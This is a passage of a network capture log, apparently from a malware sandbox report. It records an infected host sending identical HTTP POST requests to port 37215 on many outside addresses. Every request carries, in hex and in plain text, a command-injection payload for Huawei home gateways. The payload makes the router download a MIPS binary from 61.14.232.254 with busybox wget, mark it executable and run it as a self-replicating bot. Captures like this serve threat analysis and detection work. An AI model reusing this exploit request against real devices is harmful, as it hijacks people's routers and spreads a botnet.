                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  676192.168.2.133690841.225.21.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369281054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  677192.168.2.1339184197.212.238.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369322062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  678192.168.2.1348552157.245.40.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369365931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  679192.168.2.133608841.55.45.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369395018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  680192.168.2.1334708197.133.123.13137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369514942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  681192.168.2.1345024197.195.137.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369534969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  682192.168.2.1353146157.58.52.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369548082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  683192.168.2.1349634197.39.141.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369571924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  684192.168.2.1358028197.164.94.13837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369642019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  685192.168.2.133706441.209.135.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369663954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 